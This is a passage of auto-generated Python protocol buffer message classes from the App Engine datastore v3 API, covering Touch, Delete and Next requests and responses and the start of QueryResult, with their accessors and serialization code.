      cnt+=1
    cnt=0
    for e in self.composite_index_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("composite_index%s <\n" % elm)
      res+=e.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
      cnt+=1
    if self.has_force_: res+=prefix+("force: %s\n" % self.DebugFormatBool(self.force_))
    cnt=0
    for e in self.snapshot_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("snapshot%s <\n" % elm)
      res+=e.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
      cnt+=1
    return res


  def _BuildTagLookupTable(sparse, maxtag, default=None):
    return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])

  kheader = 10
  kkey = 1
  kcomposite_index = 2
  kforce = 3
  ksnapshot = 9

  _TEXT = _BuildTagLookupTable({
    0: "ErrorCode",
    1: "key",
    2: "composite_index",
    3: "force",
    9: "snapshot",
    10: "header",
  }, 10)

  _TYPES = _BuildTagLookupTable({
    0: ProtocolBuffer.Encoder.NUMERIC,
    1: ProtocolBuffer.Encoder.STRING,
    2: ProtocolBuffer.Encoder.STRING,
    3: ProtocolBuffer.Encoder.NUMERIC,
    9: ProtocolBuffer.Encoder.STRING,
    10: ProtocolBuffer.Encoder.STRING,
  }, 10, ProtocolBuffer.Encoder.MAX_TYPE)


  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""
  _PROTO_DESCRIPTOR_NAME = 'apphosting_datastore_v3.TouchRequest'
class TouchResponse(ProtocolBuffer.ProtocolMessage):
  has_cost_ = 0
  cost_ = None

  def __init__(self, contents=None):
    self.lazy_init_lock_ = thread.allocate_lock()
    if contents is not None: self.MergeFromString(contents)

  def cost(self):
    if self.cost_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.cost_ is None: self.cost_ = Cost()
      finally:
        self.lazy_init_lock_.release()
    return self.cost_

  def mutable_cost(self): self.has_cost_ = 1; return self.cost()

  def clear_cost(self):

    if self.has_cost_:
      self.has_cost_ = 0;
      if self.cost_ is not None: self.cost_.Clear()

  def has_cost(self): return self.has_cost_


  def MergeFrom(self, x):
    assert x is not self
    if (x.has_cost()): self.mutable_cost().MergeFrom(x.cost())

  def Equals(self, x):
    if x is self: return 1
    if self.has_cost_ != x.has_cost_: return 0
    if self.has_cost_ and self.cost_ != x.cost_: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    initialized = 1
    if (self.has_cost_ and not self.cost_.IsInitialized(debug_strs)): initialized = 0
    return initialized

  def ByteSize(self):
    n = 0
    if (self.has_cost_): n += 1 + self.lengthString(self.cost_.ByteSize())
    return n

  def ByteSizePartial(self):
    n = 0
    if (self.has_cost_): n += 1 + self.lengthString(self.cost_.ByteSizePartial())
    return n

  def Clear(self):
    self.clear_cost()

  def OutputUnchecked(self, out):
    if (self.has_cost_):
      out.putVarInt32(10)
      out.putVarInt32(self.cost_.ByteSize())
      self.cost_.OutputUnchecked(out)

  def OutputPartial(self, out):
    if (self.has_cost_):
      out.putVarInt32(10)
      out.putVarInt32(self.cost_.ByteSizePartial())
      self.cost_.OutputPartial(out)

  def TryMerge(self, d):
    while d.avail() > 0:
      tt = d.getVarInt32()
      if tt == 10:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_cost().TryMerge(tmp)
        continue


      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    res=""
    if self.has_cost_:
      res+=prefix+"cost <\n"
      res+=self.cost_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    return res


  def _BuildTagLookupTable(sparse, maxtag, default=None):
    return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])

  kcost = 1

  _TEXT = _BuildTagLookupTable({
    0: "ErrorCode",
    1: "cost",
  }, 1)

  _TYPES = _BuildTagLookupTable({
    0: ProtocolBuffer.Encoder.NUMERIC,
    1: ProtocolBuffer.Encoder.STRING,
  }, 1, ProtocolBuffer.Encoder.MAX_TYPE)


  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""
  _PROTO_DESCRIPTOR_NAME = 'apphosting_datastore_v3.TouchResponse'
class DeleteRequest(ProtocolBuffer.ProtocolMessage):
  has_header_ = 0
  header_ = None
  has_transaction_ = 0
  transaction_ = None
  has_trusted_ = 0
  trusted_ = 0
  has_force_ = 0
  force_ = 0
  has_mark_changes_ = 0
  mark_changes_ = 0

  def __init__(self, contents=None):
    self.key_ = []
    self.composite_index_ = []
    self.snapshot_ = []
    self.lazy_init_lock_ = thread.allocate_lock()
    if contents is not None: self.MergeFromString(contents)

  def header(self):
    if self.header_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.header_ is None: self.header_ = InternalHeader()
      finally:
        self.lazy_init_lock_.release()
    return self.header_

  def mutable_header(self): self.has_header_ = 1; return self.header()

  def clear_header(self):

    if self.has_header_:
      self.has_header_ = 0;
      if self.header_ is not None: self.header_.Clear()

  def has_header(self): return self.has_header_

  def key_size(self): return len(self.key_)
  def key_list(self): return self.key_

  def key(self, i):
    return self.key_[i]

  def mutable_key(self, i):
    return self.key_[i]

  def add_key(self):
    x = Reference()
    self.key_.append(x)
    return x

  def clear_key(self):
    self.key_ = []
  def transaction(self):
    if self.transaction_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.transaction_ is None: self.transaction_ = Transaction()
      finally:
        self.lazy_init_lock_.release()
    return self.transaction_

  def mutable_transaction(self): self.has_transaction_ = 1; return self.transaction()

  def clear_transaction(self):

    if self.has_transaction_:
      self.has_transaction_ = 0;
      if self.transaction_ is not None: self.transaction_.Clear()

  def has_transaction(self): return self.has_transaction_

  def composite_index_size(self): return len(self.composite_index_)
  def composite_index_list(self): return self.composite_index_

  def composite_index(self, i):
    return self.composite_index_[i]

  def mutable_composite_index(self, i):
    return self.composite_index_[i]

  def add_composite_index(self):
    x = CompositeIndex()
    self.composite_index_.append(x)
    return x

  def clear_composite_index(self):
    self.composite_index_ = []
  def trusted(self): return self.trusted_

  def set_trusted(self, x):
    self.has_trusted_ = 1
    self.trusted_ = x

  def clear_trusted(self):
    if self.has_trusted_:
      self.has_trusted_ = 0
      self.trusted_ = 0

  def has_trusted(self): return self.has_trusted_

  def force(self): return self.force_

  def set_force(self, x):
    self.has_force_ = 1
    self.force_ = x

  def clear_force(self):
    if self.has_force_:
      self.has_force_ = 0
      self.force_ = 0

  def has_force(self): return self.has_force_

  def mark_changes(self): return self.mark_changes_

  def set_mark_changes(self, x):
    self.has_mark_changes_ = 1
    self.mark_changes_ = x

  def clear_mark_changes(self):
    if self.has_mark_changes_:
      self.has_mark_changes_ = 0
      self.mark_changes_ = 0

  def has_mark_changes(self): return self.has_mark_changes_

  def snapshot_size(self): return len(self.snapshot_)
  def snapshot_list(self): return self.snapshot_

  def snapshot(self, i):
    return self.snapshot_[i]

  def mutable_snapshot(self, i):
    return self.snapshot_[i]

  def add_snapshot(self):
    x = Snapshot()
    self.snapshot_.append(x)
    return x

  def clear_snapshot(self):
    self.snapshot_ = []

  def MergeFrom(self, x):
    assert x is not self
    if (x.has_header()): self.mutable_header().MergeFrom(x.header())
    for i in xrange(x.key_size()): self.add_key().CopyFrom(x.key(i))
    if (x.has_transaction()): self.mutable_transaction().MergeFrom(x.transaction())
    for i in xrange(x.composite_index_size()): self.add_composite_index().CopyFrom(x.composite_index(i))
    if (x.has_trusted()): self.set_trusted(x.trusted())
    if (x.has_force()): self.set_force(x.force())
    if (x.has_mark_changes()): self.set_mark_changes(x.mark_changes())
    for i in xrange(x.snapshot_size()): self.add_snapshot().CopyFrom(x.snapshot(i))

  def Equals(self, x):
    if x is self: return 1
    if self.has_header_ != x.has_header_: return 0
    if self.has_header_ and self.header_ != x.header_: return 0
    if len(self.key_) != len(x.key_): return 0
    for e1, e2 in zip(self.key_, x.key_):
      if e1 != e2: return 0
    if self.has_transaction_ != x.has_transaction_: return 0
    if self.has_transaction_ and self.transaction_ != x.transaction_: return 0
    if len(self.composite_index_) != len(x.composite_index_): return 0
    for e1, e2 in zip(self.composite_index_, x.composite_index_):
      if e1 != e2: return 0
    if self.has_trusted_ != x.has_trusted_: return 0
    if self.has_trusted_ and self.trusted_ != x.trusted_: return 0
    if self.has_force_ != x.has_force_: return 0
    if self.has_force_ and self.force_ != x.force_: return 0
    if self.has_mark_changes_ != x.has_mark_changes_: return 0
    if self.has_mark_changes_ and self.mark_changes_ != x.mark_changes_: return 0
    if len(self.snapshot_) != len(x.snapshot_): return 0
    for e1, e2 in zip(self.snapshot_, x.snapshot_):
      if e1 != e2: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    initialized = 1
    if (self.has_header_ and not self.header_.IsInitialized(debug_strs)): initialized = 0
    for p in self.key_:
      if not p.IsInitialized(debug_strs): initialized=0
    if (self.has_transaction_ and not self.transaction_.IsInitialized(debug_strs)): initialized = 0
    for p in self.composite_index_:
      if not p.IsInitialized(debug_strs): initialized=0
    for p in self.snapshot_:
      if not p.IsInitialized(debug_strs): initialized=0
    return initialized

  def ByteSize(self):
    n = 0
    if (self.has_header_): n += 1 + self.lengthString(self.header_.ByteSize())
    n += 1 * len(self.key_)
    for i in xrange(len(self.key_)): n += self.lengthString(self.key_[i].ByteSize())
    if (self.has_transaction_): n += 1 + self.lengthString(self.transaction_.ByteSize())
    n += 1 * len(self.composite_index_)
    for i in xrange(len(self.composite_index_)): n += self.lengthString(self.composite_index_[i].ByteSize())
    if (self.has_trusted_): n += 2
    if (self.has_force_): n += 2
    if (self.has_mark_changes_): n += 2
    n += 1 * len(self.snapshot_)
    for i in xrange(len(self.snapshot_)): n += self.lengthString(self.snapshot_[i].ByteSize())
    return n

  def ByteSizePartial(self):
    n = 0
    if (self.has_header_): n += 1 + self.lengthString(self.header_.ByteSizePartial())
    n += 1 * len(self.key_)
    for i in xrange(len(self.key_)): n += self.lengthString(self.key_[i].ByteSizePartial())
    if (self.has_transaction_): n += 1 + self.lengthString(self.transaction_.ByteSizePartial())
    n += 1 * len(self.composite_index_)
    for i in xrange(len(self.composite_index_)): n += self.lengthString(self.composite_index_[i].ByteSizePartial())
    if (self.has_trusted_): n += 2
    if (self.has_force_): n += 2
    if (self.has_mark_changes_): n += 2
    n += 1 * len(self.snapshot_)
    for i in xrange(len(self.snapshot_)): n += self.lengthString(self.snapshot_[i].ByteSizePartial())
    return n

  def Clear(self):
    self.clear_header()
    self.clear_key()
    self.clear_transaction()
    self.clear_composite_index()
    self.clear_trusted()
    self.clear_force()
    self.clear_mark_changes()
    self.clear_snapshot()

  def OutputUnchecked(self, out):
    if (self.has_trusted_):
      out.putVarInt32(32)
      out.putBoolean(self.trusted_)
    if (self.has_transaction_):
      out.putVarInt32(42)
      out.putVarInt32(self.transaction_.ByteSize())
      self.transaction_.OutputUnchecked(out)
    for i in xrange(len(self.key_)):
      out.putVarInt32(50)
      out.putVarInt32(self.key_[i].ByteSize())
      self.key_[i].OutputUnchecked(out)
    if (self.has_force_):
      out.putVarInt32(56)
      out.putBoolean(self.force_)
    if (self.has_mark_changes_):
      out.putVarInt32(64)
      out.putBoolean(self.mark_changes_)
    for i in xrange(len(self.snapshot_)):
      out.putVarInt32(74)
      out.putVarInt32(self.snapshot_[i].ByteSize())
      self.snapshot_[i].OutputUnchecked(out)
    if (self.has_header_):
      out.putVarInt32(82)
      out.putVarInt32(self.header_.ByteSize())
      self.header_.OutputUnchecked(out)
    for i in xrange(len(self.composite_index_)):
      out.putVarInt32(90)
      out.putVarInt32(self.composite_index_[i].ByteSize())
      self.composite_index_[i].OutputUnchecked(out)

  def OutputPartial(self, out):
    if (self.has_trusted_):
      out.putVarInt32(32)
      out.putBoolean(self.trusted_)
    if (self.has_transaction_):
      out.putVarInt32(42)
      out.putVarInt32(self.transaction_.ByteSizePartial())
      self.transaction_.OutputPartial(out)
    for i in xrange(len(self.key_)):
      out.putVarInt32(50)
      out.putVarInt32(self.key_[i].ByteSizePartial())
      self.key_[i].OutputPartial(out)
    if (self.has_force_):
      out.putVarInt32(56)
      out.putBoolean(self.force_)
    if (self.has_mark_changes_):
      out.putVarInt32(64)
      out.putBoolean(self.mark_changes_)
    for i in xrange(len(self.snapshot_)):
      out.putVarInt32(74)
      out.putVarInt32(self.snapshot_[i].ByteSizePartial())
      self.snapshot_[i].OutputPartial(out)
    if (self.has_header_):
      out.putVarInt32(82)
      out.putVarInt32(self.header_.ByteSizePartial())
      self.header_.OutputPartial(out)
    for i in xrange(len(self.composite_index_)):
      out.putVarInt32(90)
      out.putVarInt32(self.composite_index_[i].ByteSizePartial())
      self.composite_index_[i].OutputPartial(out)

  def TryMerge(self, d):
    while d.avail() > 0:
      tt = d.getVarInt32()
      if tt == 32:
        self.set_trusted(d.getBoolean())
        continue
      if tt == 42:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_transaction().TryMerge(tmp)
        continue
      if tt == 50:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.add_key().TryMerge(tmp)
        continue
      if tt == 56:
        self.set_force(d.getBoolean())
        continue
      if tt == 64:
        self.set_mark_changes(d.getBoolean())
        continue
      if tt == 74:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.add_snapshot().TryMerge(tmp)
        continue
      if tt == 82:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_header().TryMerge(tmp)
        continue
      if tt == 90:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.add_composite_index().TryMerge(tmp)
        continue


      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    res=""
    if self.has_header_:
      res+=prefix+"header <\n"
      res+=self.header_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    cnt=0
    for e in self.key_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("key%s <\n" % elm)
      res+=e.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
      cnt+=1
    if self.has_transaction_:
      res+=prefix+"transaction <\n"
      res+=self.transaction_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    cnt=0
    for e in self.composite_index_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("composite_index%s <\n" % elm)
      res+=e.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
      cnt+=1
    if self.has_trusted_: res+=prefix+("trusted: %s\n" % self.DebugFormatBool(self.trusted_))
    if self.has_force_: res+=prefix+("force: %s\n" % self.DebugFormatBool(self.force_))
    if self.has_mark_changes_: res+=prefix+("mark_changes: %s\n" % self.DebugFormatBool(self.mark_changes_))
    cnt=0
    for e in self.snapshot_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("snapshot%s <\n" % elm)
      res+=e.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
      cnt+=1
    return res


  def _BuildTagLookupTable(sparse, maxtag, default=None):
    return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])

  kheader = 10
  kkey = 6
  ktransaction = 5
  kcomposite_index = 11
  ktrusted = 4
  kforce = 7
  kmark_changes = 8
  ksnapshot = 9

  _TEXT = _BuildTagLookupTable({
    0: "ErrorCode",
    4: "trusted",
    5: "transaction",
    6: "key",
    7: "force",
    8: "mark_changes",
    9: "snapshot",
    10: "header",
    11: "composite_index",
  }, 11)

  _TYPES = _BuildTagLookupTable({
    0: ProtocolBuffer.Encoder.NUMERIC,
    4: ProtocolBuffer.Encoder.NUMERIC,
    5: ProtocolBuffer.Encoder.STRING,
    6: ProtocolBuffer.Encoder.STRING,
    7: ProtocolBuffer.Encoder.NUMERIC,
    8: ProtocolBuffer.Encoder.NUMERIC,
    9: ProtocolBuffer.Encoder.STRING,
    10: ProtocolBuffer.Encoder.STRING,
    11: ProtocolBuffer.Encoder.STRING,
  }, 11, ProtocolBuffer.Encoder.MAX_TYPE)


  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""
  _PROTO_DESCRIPTOR_NAME = 'apphosting_datastore_v3.DeleteRequest'
class DeleteResponse(ProtocolBuffer.ProtocolMessage):
  has_cost_ = 0
  cost_ = None

  def __init__(self, contents=None):
    self.version_ = []
    self.lazy_init_lock_ = thread.allocate_lock()
    if contents is not None: self.MergeFromString(contents)

  def cost(self):
    if self.cost_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.cost_ is None: self.cost_ = Cost()
      finally:
        self.lazy_init_lock_.release()
    return self.cost_

  def mutable_cost(self): self.has_cost_ = 1; return self.cost()

  def clear_cost(self):

    if self.has_cost_:
      self.has_cost_ = 0;
      if self.cost_ is not None: self.cost_.Clear()

  def has_cost(self): return self.has_cost_

  def version_size(self): return len(self.version_)
  def version_list(self): return self.version_

  def version(self, i):
    return self.version_[i]

  def set_version(self, i, x):
    self.version_[i] = x

  def add_version(self, x):
    self.version_.append(x)

  def clear_version(self):
    self.version_ = []


  def MergeFrom(self, x):
    assert x is not self
    if (x.has_cost()): self.mutable_cost().MergeFrom(x.cost())
    for i in xrange(x.version_size()): self.add_version(x.version(i))

  def Equals(self, x):
    if x is self: return 1
    if self.has_cost_ != x.has_cost_: return 0
    if self.has_cost_ and self.cost_ != x.cost_: return 0
    if len(self.version_) != len(x.version_): return 0
    for e1, e2 in zip(self.version_, x.version_):
      if e1 != e2: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    initialized = 1
    if (self.has_cost_ and not self.cost_.IsInitialized(debug_strs)): initialized = 0
    return initialized

  def ByteSize(self):
    n = 0
    if (self.has_cost_): n += 1 + self.lengthString(self.cost_.ByteSize())
    n += 1 * len(self.version_)
    for i in xrange(len(self.version_)): n += self.lengthVarInt64(self.version_[i])
    return n

  def ByteSizePartial(self):
    n = 0
    if (self.has_cost_): n += 1 + self.lengthString(self.cost_.ByteSizePartial())
    n += 1 * len(self.version_)
    for i in xrange(len(self.version_)): n += self.lengthVarInt64(self.version_[i])
    return n

  def Clear(self):
    self.clear_cost()
    self.clear_version()

  def OutputUnchecked(self, out):
    if (self.has_cost_):
      out.putVarInt32(10)
      out.putVarInt32(self.cost_.ByteSize())
      self.cost_.OutputUnchecked(out)
    for i in xrange(len(self.version_)):
      out.putVarInt32(24)
      out.putVarInt64(self.version_[i])

  def OutputPartial(self, out):
    if (self.has_cost_):
      out.putVarInt32(10)
      out.putVarInt32(self.cost_.ByteSizePartial())
      self.cost_.OutputPartial(out)
    for i in xrange(len(self.version_)):
      out.putVarInt32(24)
      out.putVarInt64(self.version_[i])

  def TryMerge(self, d):
    while d.avail() > 0:
      tt = d.getVarInt32()
      if tt == 10:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_cost().TryMerge(tmp)
        continue
      if tt == 24:
        self.add_version(d.getVarInt64())
        continue


      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    res=""
    if self.has_cost_:
      res+=prefix+"cost <\n"
      res+=self.cost_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    cnt=0
    for e in self.version_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("version%s: %s\n" % (elm, self.DebugFormatInt64(e)))
      cnt+=1
    return res


  def _BuildTagLookupTable(sparse, maxtag, default=None):
    return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])

  kcost = 1
  kversion = 3

  _TEXT = _BuildTagLookupTable({
    0: "ErrorCode",
    1: "cost",
    3: "version",
  }, 3)

  _TYPES = _BuildTagLookupTable({
    0: ProtocolBuffer.Encoder.NUMERIC,
    1: ProtocolBuffer.Encoder.STRING,
    3: ProtocolBuffer.Encoder.NUMERIC,
  }, 3, ProtocolBuffer.Encoder.MAX_TYPE)


  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""
  _PROTO_DESCRIPTOR_NAME = 'apphosting_datastore_v3.DeleteResponse'
class NextRequest(ProtocolBuffer.ProtocolMessage):
  has_header_ = 0
  header_ = None
  has_cursor_ = 0
  has_count_ = 0
  count_ = 0
  has_offset_ = 0
  offset_ = 0
  has_compile_ = 0
  compile_ = 0

  def __init__(self, contents=None):
    self.cursor_ = Cursor()
    self.lazy_init_lock_ = thread.allocate_lock()
    if contents is not None: self.MergeFromString(contents)

  def header(self):
    if self.header_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.header_ is None: self.header_ = InternalHeader()
      finally:
        self.lazy_init_lock_.release()
    return self.header_

  def mutable_header(self): self.has_header_ = 1; return self.header()

  def clear_header(self):

    if self.has_header_:
      self.has_header_ = 0;
      if self.header_ is not None: self.header_.Clear()

  def has_header(self): return self.has_header_

  def cursor(self): return self.cursor_

  def mutable_cursor(self): self.has_cursor_ = 1; return self.cursor_

  def clear_cursor(self):self.has_cursor_ = 0; self.cursor_.Clear()

  def has_cursor(self): return self.has_cursor_

  def count(self): return self.count_

  def set_count(self, x):
    self.has_count_ = 1
    self.count_ = x

  def clear_count(self):
    if self.has_count_:
      self.has_count_ = 0
      self.count_ = 0

  def has_count(self): return self.has_count_

  def offset(self): return self.offset_

  def set_offset(self, x):
    self.has_offset_ = 1
    self.offset_ = x

  def clear_offset(self):
    if self.has_offset_:
      self.has_offset_ = 0
      self.offset_ = 0

  def has_offset(self): return self.has_offset_

  def compile(self): return self.compile_

  def set_compile(self, x):
    self.has_compile_ = 1
    self.compile_ = x

  def clear_compile(self):
    if self.has_compile_:
      self.has_compile_ = 0
      self.compile_ = 0

  def has_compile(self): return self.has_compile_


  def MergeFrom(self, x):
    assert x is not self
    if (x.has_header()): self.mutable_header().MergeFrom(x.header())
    if (x.has_cursor()): self.mutable_cursor().MergeFrom(x.cursor())
    if (x.has_count()): self.set_count(x.count())
    if (x.has_offset()): self.set_offset(x.offset())
    if (x.has_compile()): self.set_compile(x.compile())

  def Equals(self, x):
    if x is self: return 1
    if self.has_header_ != x.has_header_: return 0
    if self.has_header_ and self.header_ != x.header_: return 0
    if self.has_cursor_ != x.has_cursor_: return 0
    if self.has_cursor_ and self.cursor_ != x.cursor_: return 0
    if self.has_count_ != x.has_count_: return 0
    if self.has_count_ and self.count_ != x.count_: return 0
    if self.has_offset_ != x.has_offset_: return 0
    if self.has_offset_ and self.offset_ != x.offset_: return 0
    if self.has_compile_ != x.has_compile_: return 0
    if self.has_compile_ and self.compile_ != x.compile_: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    initialized = 1
    if (self.has_header_ and not self.header_.IsInitialized(debug_strs)): initialized = 0
    if (not self.has_cursor_):
      initialized = 0
      if debug_strs is not None:
        debug_strs.append('Required field: cursor not set.')
    elif not self.cursor_.IsInitialized(debug_strs): initialized = 0
    return initialized

  def ByteSize(self):
    n = 0
    if (self.has_header_): n += 1 + self.lengthString(self.header_.ByteSize())
    n += self.lengthString(self.cursor_.ByteSize())
    if (self.has_count_): n += 1 + self.lengthVarInt64(self.count_)
    if (self.has_offset_): n += 1 + self.lengthVarInt64(self.offset_)
    if (self.has_compile_): n += 2
    return n + 1

  def ByteSizePartial(self):
    n = 0
    if (self.has_header_): n += 1 + self.lengthString(self.header_.ByteSizePartial())
    if (self.has_cursor_):
      n += 1
      n += self.lengthString(self.cursor_.ByteSizePartial())
    if (self.has_count_): n += 1 + self.lengthVarInt64(self.count_)
    if (self.has_offset_): n += 1 + self.lengthVarInt64(self.offset_)
    if (self.has_compile_): n += 2
    return n

  def Clear(self):
    self.clear_header()
    self.clear_cursor()
    self.clear_count()
    self.clear_offset()
    self.clear_compile()

  def OutputUnchecked(self, out):
    out.putVarInt32(10)
    out.putVarInt32(self.cursor_.ByteSize())
    self.cursor_.OutputUnchecked(out)
    if (self.has_count_):
      out.putVarInt32(16)
      out.putVarInt32(self.count_)
    if (self.has_compile_):
      out.putVarInt32(24)
      out.putBoolean(self.compile_)
    if (self.has_offset_):
      out.putVarInt32(32)
      out.putVarInt32(self.offset_)
    if (self.has_header_):
      out.putVarInt32(42)
      out.putVarInt32(self.header_.ByteSize())
      self.header_.OutputUnchecked(out)

  def OutputPartial(self, out):
    if (self.has_cursor_):
      out.putVarInt32(10)
      out.putVarInt32(self.cursor_.ByteSizePartial())
      self.cursor_.OutputPartial(out)
    if (self.has_count_):
      out.putVarInt32(16)
      out.putVarInt32(self.count_)
    if (self.has_compile_):
      out.putVarInt32(24)
      out.putBoolean(self.compile_)
    if (self.has_offset_):
      out.putVarInt32(32)
      out.putVarInt32(self.offset_)
    if (self.has_header_):
      out.putVarInt32(42)
      out.putVarInt32(self.header_.ByteSizePartial())
      self.header_.OutputPartial(out)

  def TryMerge(self, d):
    while d.avail() > 0:
      tt = d.getVarInt32()
      if tt == 10:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_cursor().TryMerge(tmp)
        continue
      if tt == 16:
        self.set_count(d.getVarInt32())
        continue
      if tt == 24:
        self.set_compile(d.getBoolean())
        continue
      if tt == 32:
        self.set_offset(d.getVarInt32())
        continue
      if tt == 42:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_header().TryMerge(tmp)
        continue


      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    res=""
    if self.has_header_:
      res+=prefix+"header <\n"
      res+=self.header_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    if self.has_cursor_:
      res+=prefix+"cursor <\n"
      res+=self.cursor_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    if self.has_count_: res+=prefix+("count: %s\n" % self.DebugFormatInt32(self.count_))
    if self.has_offset_: res+=prefix+("offset: %s\n" % self.DebugFormatInt32(self.offset_))
    if self.has_compile_: res+=prefix+("compile: %s\n" % self.DebugFormatBool(self.compile_))
    return res


  def _BuildTagLookupTable(sparse, maxtag, default=None):
    return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])

  kheader = 5
  kcursor = 1
  kcount = 2
  koffset = 4
  kcompile = 3

  _TEXT = _BuildTagLookupTable({
    0: "ErrorCode",
    1: "cursor",
    2: "count",
    3: "compile",
    4: "offset",
    5: "header",
  }, 5)

  _TYPES = _BuildTagLookupTable({
    0: ProtocolBuffer.Encoder.NUMERIC,
    1: ProtocolBuffer.Encoder.STRING,
    2: ProtocolBuffer.Encoder.NUMERIC,
    3: ProtocolBuffer.Encoder.NUMERIC,
    4: ProtocolBuffer.Encoder.NUMERIC,
    5: ProtocolBuffer.Encoder.STRING,
  }, 5, ProtocolBuffer.Encoder.MAX_TYPE)


  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""
  _PROTO_DESCRIPTOR_NAME = 'apphosting_datastore_v3.NextRequest'
class QueryResult(ProtocolBuffer.ProtocolMessage):
  has_cursor_ = 0
  cursor_ = None
  has_skipped_results_ = 0
  skipped_results_ = 0
  has_more_results_ = 0
  more_results_ = 0
  has_keys_only_ = 0
  keys_only_ = 0
  has_index_only_ = 0
  index_only_ = 0
  has_small_ops_ = 0
  small_ops_ = 0
  has_compiled_query_ = 0
  compiled_query_ = None
  has_compiled_cursor_ = 0
  compiled_cursor_ = None
  has_skipped_results_compiled_cursor_ = 0
  skipped_results_compiled_cursor_ = None

  def __init__(self, contents=None):
    self.result_ = []
    self.index_ = []
    self.version_ = []
    self.result_compiled_cursor_ = []
    self.lazy_init_lock_ = thread.allocate_lock()
    if contents is not None: self.MergeFromString(contents)

  def cursor(self):
    if self.cursor_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.cursor_ is None: self.cursor_ = Cursor()
      finally:
        self.lazy_init_lock_.release()
    return self.cursor_

  def mutable_cursor(self): self.has_cursor_ = 1; return self.cursor()

  def clear_cursor(self):

    if self.has_cursor_:
      self.has_cursor_ = 0;
      if self.cursor_ is not None: self.cursor_.Clear()

  def has_cursor(self): return self.has_cursor_

  def result_size(self): return len(self.result_)
  def result_list(self): return self.result_

  def result(self, i):
    return self.result_[i]

  def mutable_result(self, i):
    return self.result_[i]

  def add_result(self):
    x = EntityProto()
    self.result_.append(x)
    return x

  def clear_result(self):
    self.result_ = []
  def skipped_results(self): return self.skipped_results_

  def set_skipped_results(self, x):
    self.has_skipped_results_ = 1
    self.skipped_results_ = x

  def clear_skipped_results(self):
    if self.has_skipped_results_:
      self.has_skipped_results_ = 0
      self.skipped_results_ = 0

  def has_skipped_results(self): return self.has_skipped_results_

  def more_results(self): return self.more_results_

  def set_more_results(self, x):
    self.has_more_results_ = 1
    self.more_results_ = x

  def clear_more_results(self):
    if self.has_more_results_:
      self.has_more_results_ = 0
      self.more_results_ = 0

  def has_more_results(self): return self.has_more_results_

  def keys_only(self): return self.keys_only_

  def set_keys_only(self, x):
    self.has_keys_only_ = 1
    self.keys_only_ = x

  def clear_keys_only(self):
    if self.has_keys_only_:
      self.has_keys_only_ = 0
      self.keys_only_ = 0

  def has_keys_only(self): return self.has_keys_only_

  def index_only(self): return self.index_only_

  def set_index_only(self, x):
    self.has_index_only_ = 1
    self.index_only_ = x

  def clear_index_only(self):
